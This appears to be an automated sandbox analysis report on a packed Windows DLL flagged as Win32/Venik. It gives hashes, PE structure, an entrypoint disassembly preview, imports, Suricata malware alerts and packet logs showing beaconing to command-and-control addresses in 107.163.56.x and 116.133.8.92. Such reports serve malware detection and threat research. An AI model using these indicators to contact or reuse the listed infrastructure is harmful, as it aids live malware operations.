                                                                                                                                                                        SSDEEP:3072:BVkgEz4rVOfek2THpgQqqMkPtghomXHNoh2+fS8BpuSNXVACL7I1:LkgEz4sjOp1tyoGX+fzGM2Co
                                                                                                                                                                        TLSH:011412D059EA21BAC087C37014B7FD2DEA446575E9694C09EBCAF131BD33B20B86A356
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N................

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:7ae282899bbab082

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x10062b8d
                                                                                                                                                                        Entrypoint Section:.tyi1
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x10000000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                                                                                                                        DLL Characteristics:
                                                                                                                                                                        Time Stamp:0x5667D311 [Wed Dec 9 07:06:57 2015 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:4
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:e7361d096d72b868eab81a55f14cbe3a

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        jmp 00007FB760BDCCDCh
                                                                                                                                                                        inc ebx
                                                                                                                                                                        dec ebx
                                                                                                                                                                        xchg eax, ecx
                                                                                                                                                                        mov seg?, word ptr [ecx]
                                                                                                                                                                        add byte ptr [esp+eax*8], cl
                                                                                                                                                                        xor ah, ah
                                                                                                                                                                        add ah, ch
                                                                                                                                                                        xor al, ch
                                                                                                                                                                        adc ah, bl
                                                                                                                                                                        sbb ah, ah
                                                                                                                                                                        in al, 0Ch
                                                                                                                                                                        or bh, byte ptr [esi-2A605E18h]
                                                                                                                                                                        stc
                                                                                                                                                                        xor ecx, ebx
                                                                                                                                                                        xor ch, bh
                                                                                                                                                                        retn 0FB3h
                                                                                                                                                                        in eax, dx
                                                                                                                                                                        in eax, dx
                                                                                                                                                                        in eax, 1Bh
                                                                                                                                                                        cmp al, 96h
                                                                                                                                                                        stosd
                                                                                                                                                                        fdivr st(0), st(0)
                                                                                                                                                                        add byte ptr [eax+40h], cl
                                                                                                                                                                        fcmovu st(0), st(4)
                                                                                                                                                                        mov byte ptr [ebx+01h], cl
                                                                                                                                                                        pop es
                                                                                                                                                                        ret
                                                                                                                                                                        cdq
                                                                                                                                                                        wait
                                                                                                                                                                        retn CA45h
                                                                                                                                                                        bound ebx, dword ptr [eax]
                                                                                                                                                                        push ss
                                                                                                                                                                        add esi, dword ptr [ebp-1Eh]
                                                                                                                                                                        and eax, 7E7D35C7h
                                                                                                                                                                        pop esp
                                                                                                                                                                        mov al, byte ptr [A77A8284h]
                                                                                                                                                                        aaa
                                                                                                                                                                        mov dword ptr [edi], edi
                                                                                                                                                                        shr dword ptr [edi+3B26DB69h], FFFFFFEDh
                                                                                                                                                                        cmp dl, byte ptr [edi]
                                                                                                                                                                        dec ebx
                                                                                                                                                                        pop edx
                                                                                                                                                                        loop 00007FB760BF964Dh
                                                                                                                                                                        dec edi
                                                                                                                                                                        idiv byte ptr [edi+4AB2832Ah]
                                                                                                                                                                        cmpsd
                                                                                                                                                                        test dword ptr [ebx+3AC4381Bh], eax
                                                                                                                                                                        xor byte ptr [ebx+3Dh], dh
                                                                                                                                                                        adc ecx, esi
                                                                                                                                                                        aad 35h
                                                                                                                                                                        adc dword ptr [esi], esi
                                                                                                                                                                        les esp, eax
                                                                                                                                                                        aad 1Bh
                                                                                                                                                                        adc eax, ecx
                                                                                                                                                                        nop dword ptr [esi+7Ah]
                                                                                                                                                                        pushfd
                                                                                                                                                                        xchg eax, esp
                                                                                                                                                                        pop esp
                                                                                                                                                                        push edi
                                                                                                                                                                        xchg eax, esp
                                                                                                                                                                        test dword ptr [ebx+6EA66805h], 0049846Dh
                                                                                                                                                                        mov cl, 54h
                                                                                                                                                                        xchg eax, ecx
                                                                                                                                                                        pop esp
                                                                                                                                                                        test dword ptr [eax-4Fh], ebx
                                                                                                                                                                        inc esp
                                                                                                                                                                        inc eax
                                                                                                                                                                        xor byte ptr [eax-70809D72h], cl
                                                                                                                                                                        pop esp
                                                                                                                                                                        xchg eax, ebp
                                                                                                                                                                        test eax, 902FE9EFh
                                                                                                                                                                        xor dword ptr [eax], eax
                                                                                                                                                                        jmp far 1212h : F222CA3Ah
                                                                                                                                                                        ficomp dword ptr [esi]
                                                                                                                                                                        jmp far 393Dh : D602FA06h
                                                                                                                                                                        popad
                                                                                                                                                                        lodsb
                                                                                                                                                                        mov ecx, dword ptr [eax]
                                                                                                                                                                        sbb esp, ebx
                                                                                                                                                                        aaa
                                                                                                                                                                        loopne 00007FB760BF963Fh
                                                                                                                                                                        aaa
                                                                                                                                                                        lodsd
                                                                                                                                                                        xchg eax, edi

                                                                                                                                                                        Rich Headers

                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                        • [ C ] VS98 (6.0) build 8168
                                                                                                                                                                        • [C++] VS98 (6.0) build 8168
                                                                                                                                                                        • [RES] VS98 (6.0) cvtres build 1720
                                                                                                                                                                        • [LNK] VS98 (6.0) imp/exp build 8168

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x68fbc0x67.tyi1
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x60da40x118.tyi1
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6f0000x1000
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000x9c.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x6ab880x7c.tyi1
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000xc50c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0xe0000x35710x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x120000x5fe80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .tyi00x180000x267e40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .tyi10x3f0000x2e9180x2f000778f5f322b37508c5946d05e9b738ec7False0.968256524268617data7.938472536073559IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .reloc0x6e0000x9c0x100023ac04b865d4f4fbc6a3c604aa7f6f51False0.03759765625data0.26850651604269654IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0x6f0000x59c0x10009adb9cc8cac195f47b28f9ca61967dc1False0.125244140625data1.2011055032591231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                        Resources

                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_DIALOG0x6f4200x17cdataEnglishUnited States0.034210526315789476
                                                                                                                                                                        RT_VERSION0x6f0a00x380dataEnglishUnited States0.4732142857142857

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        MFC42.DLL
                                                                                                                                                                        MSVCRT.dllstrcspn
                                                                                                                                                                        KERNEL32.dllGetModuleFileNameA
                                                                                                                                                                        USER32.dllGetDesktopWindow
                                                                                                                                                                        ADVAPI32.dllRegEnumValueA
                                                                                                                                                                        WS2_32.dllhtonl
                                                                                                                                                                        SHLWAPI.dllPathIsDirectoryA
                                                                                                                                                                        ole32.dllCoUninitialize
                                                                                                                                                                        OLEAUT32.dllVariantClear
                                                                                                                                                                        MSVCP60.dll?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
                                                                                                                                                                        NETAPI32.dllNetbios
                                                                                                                                                                        KERNEL32.dllGetModuleFileNameW
                                                                                                                                                                        KERNEL32.dllGetModuleHandleA, LoadLibraryA, LocalAlloc, LocalFree, GetModuleFileNameA, ExitProcess

                                                                                                                                                                        Exports

                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                        ClassObject10x10008668
                                                                                                                                                                        InputFile20x1000679d
                                                                                                                                                                        PrintFile30x1000443d

                                                                                                                                                                        Possible Origin

                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2024-12-19T15:44:33.497786+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149706107.163.56.11018530TCP
                                                                                                                                                                        2024-12-19T15:44:35.689380+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149705107.163.56.23118530TCP
                                                                                                                                                                        2024-12-19T15:44:35.689380+01002812407ETPRO MALWARE Win32/Venik HTTP CnC Beacon1192.168.2.1149705107.163.56.23118530TCP
                                                                                                                                                                        2024-12-19T15:44:36.833681+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.1149718107.163.56.2516658TCP
                                                                                                                                                                        2024-12-19T15:44:43.735527+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149722107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:43.735567+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149723107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:43.735600+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149726116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:44:45.672388+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149729116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:44:47.735838+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149728107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:47.735838+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149730107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:51.735632+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149736116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:44:51.735671+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149733107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:51.735763+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149734107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:55.876691+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149737107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:55.876728+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149738107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:44:55.876769+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149739116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:44:57.873519+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149742116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:44:58.986252+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.1149745107.163.56.2516658TCP
                                                                                                                                                                        2024-12-19T15:45:00.001277+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149740107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:00.001293+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149741107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:02.039906+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149748116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:04.001669+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149746107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:04.001696+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149747107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:05.977914+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149752116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:08.020764+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149750107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:08.020792+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149751107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:09.958806+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149756116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:12.016757+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149754107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:12.016797+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149755107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:14.117837+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149760116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:16.032665+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149759107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:16.032697+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149758107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:20.048172+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149762107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:20.048204+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149763107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:20.048222+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149764116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:21.291466+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.1149769107.163.56.2516658TCP
                                                                                                                                                                        2024-12-19T15:45:22.017200+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149766116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:24.174267+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149767107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:24.174362+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149765107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:26.194962+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149773116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:28.298071+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149771107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:28.298130+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149772107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:30.985896+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149777116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:32.322598+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149775107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:32.322671+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149776107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:34.273735+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149781116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:36.314726+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149779107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:36.314797+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149780107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:38.289440+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149785116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:40.317140+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149784107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:40.317164+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149783107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:43.137902+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149789116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:43.513998+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.1149791107.163.56.2516658TCP
                                                                                                                                                                        2024-12-19T15:45:44.438893+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149788107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:44.439103+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149787107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:48.454782+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149793116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:48.454799+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149794107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:48.454799+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149792107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:52.605958+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149796107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:52.606082+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149795107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:52.606086+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149797116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:45:56.751358+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149798107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:56.751404+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149799107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:45:56.751441+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149800116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:00.871302+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149801107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:00.871330+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149802116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:00.871372+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149803107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:02.961800+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149805116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:05.001547+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149804107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:05.001579+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149806107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:05.655037+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.1149811107.163.56.2516658TCP
                                                                                                                                                                        2024-12-19T15:46:06.978141+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149809116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:09.017360+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149808107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:09.017413+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149810107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:10.975339+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149815116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:13.146950+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149813107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:13.146988+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149814107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:17.492707+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149818107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:17.492889+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149820116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:17.492956+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149819107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:19.448678+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149823116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:21.518675+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149822107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:21.518681+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149821107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:25.306220+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149828116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:25.658559+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149825107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:25.658612+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149827107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:27.764083+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.1149833107.163.56.2516658TCP
                                                                                                                                                                        2024-12-19T15:46:28.410219+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149830116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:29.782777+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149832107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:29.782813+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149831107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:32.408255+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149837116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:33.798470+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149836107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:33.798506+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149835107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:35.873635+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149841116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:37.814093+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149839107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:37.814098+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149840107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:39.809292+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149844116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:41.527427+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149845107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:41.527474+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149843107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:42.064075+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149848116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:42.064117+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149849107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:42.064125+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149847107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:44.107927+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149852116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:46.220249+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149850107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:46.220304+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149851107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:48.311762+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149856116.133.8.9280TCP
                                                                                                                                                                        2024-12-19T15:46:49.914765+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.1149858107.163.56.2516658TCP
                                                                                                                                                                        2024-12-19T15:46:50.349737+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149855107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:46:50.349757+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149854107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:47:12.377324+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149859107.163.56.23218963TCP
                                                                                                                                                                        2024-12-19T15:47:12.516866+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149860107.163.56.23218963TCP

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 19, 2024 15:44:11.459093094 CET4970518530192.168.2.11107.163.56.231
                                                                                                                                                                        Dec 19, 2024 15:44:11.459219933 CET4970618530192.168.2.11107.163.56.110
                                                                                                                                                                        Dec 19, 2024 15:44:11.578677893 CET1853049705107.163.56.231192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:11.578689098 CET1853049706107.163.56.110192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:11.578747988 CET4970518530192.168.2.11107.163.56.231
                                                                                                                                                                        Dec 19, 2024 15:44:11.578803062 CET4970618530192.168.2.11107.163.56.110
                                                                                                                                                                        Dec 19, 2024 15:44:11.584388971 CET4970518530192.168.2.11107.163.56.231
                                                                                                                                                                        Dec 19, 2024 15:44:11.584470034 CET4970618530192.168.2.11107.163.56.110
                                                                                                                                                                        Dec 19, 2024 15:44:11.704094887 CET1853049705107.163.56.231192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:11.704148054 CET1853049706107.163.56.110192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:33.497725010 CET1853049706107.163.56.110192.168.2.11
                                                                                                                                                                        Dec 19, 2024 15:44:33.497786045 CET4970618530192.168.2.11107.163.56.110
                                                                                                                                                                        Dec 19, 2024 15:44:33.498579025 CET4970618530192.168.2.11107.163.56.110
